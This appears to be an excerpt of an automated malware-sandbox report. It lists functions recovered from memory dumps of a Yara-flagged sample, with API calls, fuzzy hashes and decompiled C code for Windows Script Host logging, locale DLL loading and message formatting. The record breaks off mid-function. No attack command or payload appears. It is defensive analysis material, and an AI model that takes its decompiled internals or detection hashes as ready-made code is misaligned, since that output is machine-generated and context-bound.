                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0007F050,?,?,00000000), ref: 000891EC
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                                                        • Instruction ID: c601f2e2ae289350187f167b9d80c2559b345b0e0d31d68b964759fd6f4e173f
                                                        • Opcode Fuzzy Hash: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                                                        • Instruction Fuzzy Hash: F0E06D373802043AE62075A9AC02FE7B29CAB81B20F150026FA4DEA2C2D995F80142A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000891A3, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0007F050,?,?,00000000), ref: 000891EC
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: b03f41141c25b12212c33b112582574a5b123177ad4014a31a4dff1abd74324a
                                                        • Instruction ID: 19c69f28d91094c42253454846901aed39ed219de880d771c7081ebbcd4bfca9
                                                        • Opcode Fuzzy Hash: b03f41141c25b12212c33b112582574a5b123177ad4014a31a4dff1abd74324a
                                                        • Instruction Fuzzy Hash: B4F0E5373402017EE33079589C03FE7B358EF90B10F240018F689AB6C1CAA1F80183A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0008A7C1, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0007F1D2,0007F1D2,?,00000000,?,?), ref: 0008A800
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 081c446ee6c5013a380d85e7529561e9b8f2fe0a5acc0c68a6b2895574bcc5a6
                                                        • Instruction ID: 173b01b810155d408be191f05a3d66c5e8c8889141a553b13f481c21f0bcb6b4
                                                        • Opcode Fuzzy Hash: 081c446ee6c5013a380d85e7529561e9b8f2fe0a5acc0c68a6b2895574bcc5a6
                                                        • Instruction Fuzzy Hash: 51F0E5B12002046FD710DF69CC41EE7B7B9EF85200F048169FD0897702C530981987B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0008A630, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00084536,?,00084CAF,00084CAF,?,00084536,?,?,?,?,?,00000000,00000000,?), ref: 0008A65D
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                        • Instruction ID: e4a3b5555a0ecd646342859cfd2bfc0e18779972e92a541dd2b9e21fbb41912f
                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                        • Instruction Fuzzy Hash: ADE012B1200208ABDB14EF99CC41EA777ACEF88654F118559BA085B242C630F9108BB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0008A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0007F1D2,0007F1D2,?,00000000,?,?), ref: 0008A800
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                        • Instruction ID: 309186c580a382a61ffb9c83d2a66c2228bcd0ac1c2c8a2cf842a7d5d9f71115
                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                        • Instruction Fuzzy Hash: 8CE01AB12002086BDB10EF89CC85EE737ADEF89650F118165BA0857242C934E8108BF5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0007F6D0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,00078D14,?), ref: 0007F6FB
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                        • Instruction ID: 2b497bff48ec278f26eba221411dd280b8d181ac00b0d1e7ba025ff9b24c22e2
                                                        • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                        • Instruction Fuzzy Hash: 9BD05E616503092AE610BAA49C03F6632C86B44B04F4A4064FA48962C3E954E4014165
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00B8386A, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 177registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 79%
                                                        			E00B8386A(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v524;
				int _v528;
				int _v532;
				int _v536;
				long _v540;
				long _v544;
				int _v548;
				int _v552;
				int _v556;
				long _v560;
				long _v564;
				int _v568;
				WCHAR* _v572;
				union _SID_NAME_USE _v576;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t66;
				int _t75;
				void* _t78;
				int _t80;
				int _t86;
				signed int _t87;
				WCHAR* _t88;
				int _t91;
				signed int _t109;
				void* _t110;
				void* _t112;
				void* _t113;
				signed int _t117;
				intOrPtr _t118;

				_t108 = __edx;
				_t66 =  *0xb97004; // 0xbb40e64e
				_t67 = _t66 ^ _t117;
				_v8 = _t66 ^ _t117;
				_t118 =  *0xb97001; // 0x0
				if(_t118 == 0) {
					L8:
					return E00B81335(_t67, 0, _v8 ^ _t117, _t108, _t110, _t113);
				}
				_push(_t113);
				_push(_t110);
				_v564 = 0x100;
				_v552 = 0;
				_v528 = 0;
				_v544 = 0;
				_v540 = 0;
				_v548 = 0;
				_v532 = 0;
				_v536 = 0;
				E00B83415(__ecx, __edx, 0x80000001, L"Software\\Microsoft\\Windows Script Host\\Settings", 0x20019,  &_v532);
				E00B83415(__ecx, __edx, 0x80000002, L"Software\\Microsoft\\Windows Script Host\\Settings", 0x20019,  &_v536);
				if(_a4 != 0) {
					_t67 = E00B83249(__ecx, L"LogSecurityFailures", _v532, _v536, 1);
					__eflags = _t67;
					if(_t67 == 0) {
						L3:
						__imp__#6(_v548);
						if(_v536 != 0) {
							_t67 = RegCloseKey(_v536);
						}
						if(_v532 != 0) {
							_t67 = RegCloseKey(_v532);
						}
						_pop(_t110);
						_pop(_t113);
						goto L8;
					} else {
						_v560 = 0xc0ff03e8;
						_v556 = 0x10;
						L12:
						_t112 = RegisterEventSourceW(0, L"Windows Script Host");
						__eflags = _t112;
						if(_t112 != 0) {
							_t75 = GetUserNameW( &_v524,  &_v564);
							__eflags = _t75;
							if(_t75 != 0) {
								_t86 = LookupAccountNameW(0,  &_v524, 0,  &_v540, 0,  &_v544,  &_v576);
								__eflags = _v540;
								if(_v540 > 0) {
									__eflags = _v544;
									if(__eflags > 0) {
										_push(_v540);
										L00B82877();
										_v528 = _t86;
										_t87 = _v544;
										_t109 = 2;
										_t108 = _t87 * _t109 >> 0x20;
										_t88 = _t87 * _t109;
										_push( ~(0 | __eflags > 0x00000000) | _t88);
										L00B82877();
										_v552 = _t88;
										_t91 = LookupAccountNameW(0,  &_v524, _v528,  &_v540, _t88,  &_v544,  &_v576);
										__eflags = _t91;
										if(_t91 == 0) {
											_push(_v528);
											L00B82082();
											_v528 = 0;
										}
									}
								}
							}
							E00B83A91(_t108,  &_v548, _a8);
							_t78 = _v548;
							__eflags = _t78;
							if(_t78 != 0) {
								_v572 = _t78;
								_v568 = 0;
								_t80 = 1;
								__eflags = 1;
							} else {
								_v572 = 0;
								_t80 = 0;
							}
							ReportEventW(_t112, _v556, 0, _v560, _v528, _t80, 0,  &_v572, 0);
							_t67 = DeregisterEventSource(_t112);
							__eflags = _v528;
							if(_v528 != 0) {
								_push(_v528);
								L00B82082();
							}
							__eflags = _v552;
							if(_v552 != 0) {
								_push(_v552);
								L00B82082();
							}
						}
						goto L3;
					}
				}
				if(E00B83249(__ecx, L"LogSecuritySuccesses", _v532, _v536, 0) != 0) {
					_v560 = 0xff03e9;
					_v556 = 8;
					goto L12;
				}
				goto L3;
			}



































                                                        0x00b8386a
                                                        0x00b83875
                                                        0x00b8387a
                                                        0x00b8387c
                                                        0x00b83882
                                                        0x00b83888
                                                        0x00b83950
                                                        0x00b8395c
                                                        0x00b8395c
                                                        0x00b8388e
                                                        0x00b8388f
                                                        0x00b838a8
                                                        0x00b838b2
                                                        0x00b838b8
                                                        0x00b838be
                                                        0x00b838c4
                                                        0x00b838ca
                                                        0x00b838d0
                                                        0x00b838d6
                                                        0x00b838dc
                                                        0x00b838ef
                                                        0x00b838f7
                                                        0x00b88204
                                                        0x00b88209
                                                        0x00b8820b
                                                        0x00b8391c
                                                        0x00b83922
                                                        0x00b83934
                                                        0x00b8393c
                                                        0x00b8393c
                                                        0x00b83944
                                                        0x00b8394c
                                                        0x00b8394c
                                                        0x00b8394e
                                                        0x00b8394f
                                                        0x00000000
                                                        0x00b88211
                                                        0x00b88211
                                                        0x00b8821b
                                                        0x00b8823b
                                                        0x00b88247
                                                        0x00b88249
                                                        0x00b8824b
                                                        0x00b8825f
                                                        0x00b88265
                                                        0x00b88267
                                                        0x00b88292
                                                        0x00b88294
                                                        0x00b8829a
                                                        0x00b8829c
                                                        0x00b882a2
                                                        0x00b882a4
                                                        0x00b882aa
                                                        0x00b882af
                                                        0x00b882b5
                                                        0x00b882bf
                                                        0x00b882c0
                                                        0x00b882c0
                                                        0x00b882c9
                                                        0x00b882ca
                                                        0x00b882e0
                                                        0x00b882fb
                                                        0x00b882fd
                                                        0x00b882ff
                                                        0x00b88301
                                                        0x00b88307
                                                        0x00b8830d
                                                        0x00b8830d
                                                        0x00b882ff
                                                        0x00b882a2
                                                        0x00b8829a
                                                        0x00b8831d
                                                        0x00b88322
                                                        0x00b88328
                                                        0x00b8832a
                                                        0x00b88336
                                                        0x00b8833e
                                                        0x00b88344
                                                        0x00b88344
                                                        0x00b8832c
                                                        0x00b8832c
                                                        0x00b88332
                                                        0x00b88332
                                                        0x00b88363
                                                        0x00b8836a
                                                        0x00b88370
                                                        0x00b88376
                                                        0x00b88378
                                                        0x00b8837e
                                                        0x00b88383
                                                        0x00b88384
                                                        0x00b8838a
                                                        0x00b88390
                                                        0x00b88396
                                                        0x00b8839b
                                                        0x00b8838a
                                                        0x00000000
                                                        0x00b8824b
                                                        0x00b8820b
                                                        0x00b83916
                                                        0x00b88227
                                                        0x00b88231
                                                        0x00000000
                                                        0x00b88231
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00B83415: RegOpenKeyExW.ADVAPI32 ref: 00B83444
                                                        • SysFreeString.OLEAUT32(?), ref: 00B83922
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B8393C
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B8394C
                                                        • RegisterEventSourceW.ADVAPI32(00000000,Windows Script Host), ref: 00B88241
                                                        • GetUserNameW.ADVAPI32(?,00000100), ref: 00B8825F
                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00B88292
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B882AA
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B882CA
                                                        • LookupAccountNameW.ADVAPI32(00000000,?,?,?,00000000,?,?), ref: 00B882FB
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B88307
                                                        • ReportEventW.ADVAPI32(00000000,00000010,00000000,C0FF03E8,?,00000001,00000000,?,00000000), ref: 00B88363
                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00B8836A
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B8837E
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B88396
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ??3@EventName$??2@AccountCloseLookupSource$DeregisterFreeOpenRegisterReportStringUser
                                                        • String ID: LogSecurityFailures$LogSecuritySuccesses$Software\Microsoft\Windows Script Host\Settings$Windows Script Host
                                                        • API String ID: 1767439359-2261343319
                                                        • Opcode ID: d000033242533f3bcbebb4e6e33d722efe76200794faee279b9656f103364f59
                                                        • Instruction ID: bfc37acdf8a8f1217c3e1f328ced58c0f9aa5c145445cc3d63d4bb51cd369fc3
                                                        • Opcode Fuzzy Hash: d000033242533f3bcbebb4e6e33d722efe76200794faee279b9656f103364f59
                                                        • Instruction Fuzzy Hash: FF611BB284122DAFCF21AF54DC89AEEB7F8EB18700F5041EAF109A2161DA745F85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B83030, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193librarystringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00B83030(void* __ebx, void* __edi) {
				signed int _v8;
				char _v14;
				char _v16;
				char _v276;
				char _v536;
				char _v796;
				char _v1056;
				void* __esi;
				signed int _t33;
				void* _t35;
				signed int _t38;
				void* _t39;
				void* _t41;
				void* _t43;
				int _t57;
				void* _t61;
				void* _t82;
				signed short _t87;
				void* _t94;
				void* _t96;
				int _t97;
				signed int _t99;
				void* _t100;
				void* _t101;

				_t94 = __edi;
				_t82 = __ebx;
				_t33 =  *0xb97004; // 0xbb40e64e
				_v8 = _t33 ^ _t99;
				_t35 =  *0xb97020; // 0x0
				if(_t35 != 0) {
					L6:
					return E00B81335(_t35, _t82, _v8 ^ _t99, 1, _t94, _t96);
				}
				_push(_t96);
				_t97 = GetUserDefaultLCID();
				_t87 = _t97 & 0x000003ff;
				_t38 = _t87 & 0x0000ffff;
				if(1 == _t38) {
					L7:
					__eflags =  *0xb9702c - 0x7d0;
					if( *0xb9702c == 0x7d0) {
						L4:
						_t35 =  *0xb9701c; // 0x0
						L5:
						_pop(_t96);
						goto L6;
					}
					 *0xb974c4 = 0x180000;
					L3:
					if( *0xb97000 == 0) {
						_t39 = 9;
						__eflags = _t39 - _t87;
						if(_t39 == _t87) {
							goto L4;
						}
						_push(_t82);
						_push(_t94);
						_t35 = E00B93470(_t82,  *0xb9701c, _t97);
						__eflags = _t35 -  *0xb9701c; // 0x0
						if(__eflags != 0) {
							__eflags = _t35;
							if(_t35 != 0) {
								L26:
								_pop(_t94);
								_pop(_t82);
								goto L5;
							}
							L13:
							_t41 = GetLocaleInfoA(_t97, 3,  &_v16, 5);
							__eflags = _t41;
							if(_t41 != 0) {
								_t43 = LoadStringA( *0xb9701c, 0x3e9,  &_v796, 0x104);
								__eflags = _t43;
								if(_t43 == 0) {
									goto L14;
								}
								_push( &_v16);
								_t83 = "%s%s.DLL";
								E00B8F861( &_v276, 0x104, "%s%s.DLL",  &_v796);
								_t101 = _t100 + 0x14;
								GetModuleFileNameA( *0xb9701c,  &_v1056, 0x104);
								E00B934DC(0x104,  &_v1056,  &_v276,  &_v536);
								_t35 = LoadLibraryExA( &_v536, 0, 2);
								__eflags = _t35;
								if(_t35 != 0) {
									goto L26;
								}
								_t35 = LoadLibraryExA( &_v276, _t35, 2);
								__eflags = _t35;
								if(_t35 != 0) {
									goto L26;
								}
								_t57 = lstrlenA( &_v16);
								__eflags = _t57 - 2;
								if(_t57 <= 2) {
									L21:
									_t61 = GetLocaleInfoA(GetUserDefaultLCID() & 0x000003ff | 0x00000400, 3,  &_v16, 5);
									__eflags = _t61;
									if(_t61 == 0) {
										goto L14;
									}
									_push( &_v16);
									E00B8CE81( &_v276, 0x104, _t83,  &_v796);
									E00B934DC(0x104,  &_v1056,  &_v276,  &_v536);
									_t35 = LoadLibraryExA( &_v536, 0, 2);
									__eflags = _t35;
									if(_t35 != 0) {
										goto L26;
									}
									_t35 = LoadLibraryExA( &_v276, _t35, 2);
									L24:
									__eflags = _t35;
									if(_t35 == 0) {
										_t35 =  *0xb9701c; // 0x0
									}
									goto L26;
								}
								_push( &_v16);
								_v14 = 0;
								E00B8CE81( &_v276, 0x104, "%s%s.DLL",  &_v796);
								_t101 = _t101 + 0x14;
								E00B934DC(0x104,  &_v1056,  &_v276,  &_v536);
								_t35 = LoadLibraryExA( &_v536, 0, 2);
								__eflags = _t35;
								if(_t35 != 0) {
									goto L26;
								}
								_t35 = LoadLibraryExA( &_v276, _t35, 2);
								__eflags = _t35;
								if(_t35 != 0) {
									goto L26;
								}
								goto L21;
							}
							L14:
							_t35 =  *0xb97020; // 0x0
							goto L24;
						}
						_push(_t35);
						E00B94606();
						goto L13;
					}
					goto L4;
				}
				_push(0xd);
				_pop(1);
				if(1 == _t38) {
					goto L7;
				}
				goto L3;
			}



























                                                        0x00b83030
                                                        0x00b83030
                                                        0x00b8303b
                                                        0x00b83042
                                                        0x00b83045
                                                        0x00b8304c
                                                        0x00b8308d
                                                        0x00b83098
                                                        0x00b83098
                                                        0x00b8304e
                                                        0x00b83055
                                                        0x00b83059
                                                        0x00b83061
                                                        0x00b83068
                                                        0x00b892d9
                                                        0x00b892d9
                                                        0x00b892e3
                                                        0x00b83087
                                                        0x00b83087
                                                        0x00b8308c
                                                        0x00b8308c
                                                        0x00000000
                                                        0x00b8308c
                                                        0x00b892e9
                                                        0x00b8307a
                                                        0x00b83081
                                                        0x00b892fa
                                                        0x00b892fb
                                                        0x00b892fe
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89304
                                                        0x00b89305
                                                        0x00b8930d
                                                        0x00b89312
                                                        0x00b89318
                                                        0x00b89322
                                                        0x00b89324
                                                        0x00b894df
                                                        0x00b894df
                                                        0x00b894e0
                                                        0x00000000
                                                        0x00b894e0
                                                        0x00b8932a
                                                        0x00b89333
                                                        0x00b89339
                                                        0x00b8933b
                                                        0x00b8935f
                                                        0x00b89365
                                                        0x00b89367
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8936c
                                                        0x00b89374
                                                        0x00b89382
                                                        0x00b89387
                                                        0x00b89398
                                                        0x00b893b4
                                                        0x00b893ca
                                                        0x00b893cc
                                                        0x00b893ce
                                                        0x00000000
                                                        0x00000000
                                                        0x00b893de
                                                        0x00b893e0
                                                        0x00b893e2
                                                        0x00000000
                                                        0x00000000
                                                        0x00b893ec
                                                        0x00b893f2
                                                        0x00b893f5
                                                        0x00b8945b
                                                        0x00b89474
                                                        0x00b8947a
                                                        0x00b8947c
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89485
                                                        0x00b89496
                                                        0x00b894b4
                                                        0x00b894c4
                                                        0x00b894c6
                                                        0x00b894c8
                                                        0x00000000
                                                        0x00000000
                                                        0x00b894d4
                                                        0x00b894d6
                                                        0x00b894d6
                                                        0x00b894d8
                                                        0x00b894da
                                                        0x00b894da
                                                        0x00000000
                                                        0x00b894d8
                                                        0x00b893fa
                                                        0x00b8940b
                                                        0x00b8940f
                                                        0x00b89414
                                                        0x00b8942d
                                                        0x00b8943d
                                                        0x00b8943f
                                                        0x00b89441
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89451
                                                        0x00b89453
                                                        0x00b89455
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89455
                                                        0x00b8933d
                                                        0x00b8933d
                                                        0x00000000
                                                        0x00b8933d
                                                        0x00b8931a
                                                        0x00b8931b
                                                        0x00000000
                                                        0x00b8931b
                                                        0x00000000
                                                        0x00b83081
                                                        0x00b8306e
                                                        0x00b83070
                                                        0x00b83074
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        • GetUserDefaultLCID.KERNEL32(?), ref: 00B8304F
                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,00000000,00000000,00000000), ref: 00B89333
                                                        • LoadStringA.USER32 ref: 00B8935F
                                                        • GetModuleFileNameA.KERNEL32(?,00000104), ref: 00B89398
                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?), ref: 00B893CA
                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 00B893DE
                                                        • lstrlenA.KERNEL32(?), ref: 00B893EC
                                                        • ___swprintf_l.LIBCMT ref: 00B8940F
                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?), ref: 00B8943D
                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 00B89451
                                                        • GetUserDefaultLCID.KERNEL32 ref: 00B8945B
                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005), ref: 00B89474
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Load$Library$DefaultInfoLocaleUser$FileModuleNameString___swprintf_llstrlen
                                                        • String ID: %s%s.DLL
                                                        • API String ID: 1568835780-4110387156
                                                        • Opcode ID: 06114f245d2f664810d6ea13fcdc2a8152d8a46f910353a2a7445abf22700296
                                                        • Instruction ID: 621d28467fc87bfc4dc3c0b3e4421cd52973115665eacd6b5bc002923998fe31
                                                        • Opcode Fuzzy Hash: 06114f245d2f664810d6ea13fcdc2a8152d8a46f910353a2a7445abf22700296
                                                        • Instruction Fuzzy Hash: AD5142B295011DAADB21E794DC85FEA77ECEB18B00F4444E6B605E31A1EA70DB85CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B82CB9, Relevance: 16.6, APIs: 11, Instructions: 127memorywindowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 85%
                                                        			E00B82CB9(void* __edx, short* _a4, long* _a8, va_list* _a12) {
				signed int _v8;
				long _v12;
				char _v16;
				short _v20;
				char* _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t33;
				short* _t45;
				long _t46;
				void* _t52;
				int _t53;
				void* _t55;
				signed int _t57;
				char* _t58;
				intOrPtr _t60;

				_t52 = __edx;
				_t30 =  *0xb97004; // 0xbb40e64e
				_v8 = _t30 ^ _t57;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t60 =  *0xb97001; // 0x0
				if(_t60 == 0) {
					_t53 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
					if(_t53 == 0) {
						L8:
						_t33 = GetLastError();
						if(_t33 > 0) {
							_t33 = _t33 & 0x0000ffff | 0x80070000;
						}
						_v12 = _t33;
						L4:
						_t55 = LocalFree;
						if(_v16 != 0) {
							LocalFree(_v16);
						}
						if(_v20 != 0) {
							LocalFree(_v20);
						}
						return E00B81335(_v12, 0, _v8 ^ _t57, _t52, _t53, _t55);
					}
					E00B8320B(_t32);
					_v24 = _t58;
					if(_t58 == 0) {
						L18:
						_v12 = 0x8007000e;
						goto L4;
					}
					if(WideCharToMultiByte(0, 0, _a4, 0xffffffff, _v24, _t53, 0, 0) == 0 || FormatMessageA(0x500, _v24, 0, 0,  &_v16, 0, _a12) == 0) {
						goto L8;
					} else {
						_t53 = MultiByteToWideChar(0, 0, _v16, 0xffffffff, 0, 0);
						if(_t53 == 0) {
							goto L8;
						}
						_t45 = LocalAlloc(0, _t53 + _t53);
						_v20 = _t45;
						if(_t45 == 0) {
							goto L8;
						}
						_t46 = MultiByteToWideChar(0, 0, _v16, 0xffffffff, _t45, _t53);
						L2:
						if(_t46 == 0) {
							goto L8;
						}
						__imp__#2(_v20);
						 *_a8 = _t46;
						if(_t46 == 0) {
							goto L18;
						}
						goto L4;
					}
				}
				_t46 = FormatMessageW(0x500, _a4, 0, 0,  &_v20, 0, _a12);
				goto L2;
			}






















                                                        0x00b82cb9
                                                        0x00b82cc1
                                                        0x00b82cc8
                                                        0x00b82cd0
                                                        0x00b82cd3
                                                        0x00b82cd6
                                                        0x00b82cd9
                                                        0x00b82cdf
                                                        0x00b87dba
                                                        0x00b87dbe
                                                        0x00b87d8b
                                                        0x00b87d8b
                                                        0x00b87d93
                                                        0x00b87d9a
                                                        0x00b87d9a
                                                        0x00b87d9f
                                                        0x00b82d1b
                                                        0x00b82d1b
                                                        0x00b82d24
                                                        0x00b87e4b
                                                        0x00b87e4b
                                                        0x00b82d2d
                                                        0x00b82d32
                                                        0x00b82d32
                                                        0x00b82d48
                                                        0x00b82d48
                                                        0x00b87dc0
                                                        0x00b87dc5
                                                        0x00b87dca
                                                        0x00b87e3c
                                                        0x00b87e3c
                                                        0x00000000
                                                        0x00b87e3c
                                                        0x00b87ddd
                                                        0x00000000
                                                        0x00b87dfb
                                                        0x00b87e0c
                                                        0x00b87e10
                                                        0x00000000
                                                        0x00000000
                                                        0x00b87e1b
                                                        0x00b87e21
                                                        0x00b87e26
                                                        0x00000000
                                                        0x00000000
                                                        0x00b87e35
                                                        0x00b82cfd
                                                        0x00b82cff
                                                        0x00000000
                                                        0x00000000
                                                        0x00b82d08
                                                        0x00b82d11
                                                        0x00b82d15
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b82d15
                                                        0x00b87ddd
                                                        0x00b82cf7
                                                        0x00000000

                                                        APIs
                                                        • FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00B8F6DE,?,?,?), ref: 00B82CF7
                                                        • SysAllocString.OLEAUT32(?), ref: 00B82D08
                                                        • LocalFree.KERNEL32(?,?,?,?,00B8F6DE,?,?,?), ref: 00B82D32
                                                        • GetLastError.KERNEL32(?,?,?,00B8F6DE,?,?,?), ref: 00B87D8B
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00B8F6DE,?,?), ref: 00B87DB8
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000,?,?,?,00B8F6DE,?,?,?), ref: 00B87DD9
                                                        • FormatMessageA.KERNEL32(00000500,?,00000000,00000000,00B8F6DE,00000000,?,?,?,?,00B8F6DE,?,?,?), ref: 00B87DF1
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00B8F6DE,000000FF,00000000,00000000,?,?,?,00B8F6DE,?,?,?), ref: 00B87E0A
                                                        • LocalAlloc.KERNEL32(00000000,00000000,?,?,?,00B8F6DE,?,?,?), ref: 00B87E1B
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00B8F6DE,000000FF,00000000,00000000,?,?,?,00B8F6DE,?,?,?), ref: 00B87E35
                                                        • LocalFree.KERNEL32(00B8F6DE,?,?,?,00B8F6DE,?,?,?), ref: 00B87E4B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$Local$AllocFormatFreeMessage$ErrorLastString
                                                        • String ID:
                                                        • API String ID: 3217630869-0
                                                        • Opcode ID: 4303702fa768670d6e318c165e5de6b8ac230f72705bf64480bd8ddfd78ad25f
                                                        • Instruction ID: 665844f867b3eda9f4df6e2693394e874d77eb6f38c5f5f55eedf6c5e8214078
                                                        • Opcode Fuzzy Hash: 4303702fa768670d6e318c165e5de6b8ac230f72705bf64480bd8ddfd78ad25f
                                                        • Instruction Fuzzy Hash: 02410CB194415EBFDF10AFA48C84DBEBBBDEB04358B2449AAF511A71A0DA308D51DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8F0D3, Relevance: 15.1, APIs: 10, Instructions: 90fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E00B8F0D3(void* __edx, WCHAR* _a4) {
				signed int _v8;
				struct _WIN32_FIND_DATAA _v328;
				struct _WIN32_FIND_DATAW _v920;
				CHAR* _v924;
				short* _v928;
				void* _v940;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				signed int _t20;
				long _t23;
				void* _t26;
				void* _t33;
				int _t34;
				signed int _t36;
				CHAR* _t37;
				intOrPtr _t39;

				_t33 = __edx;
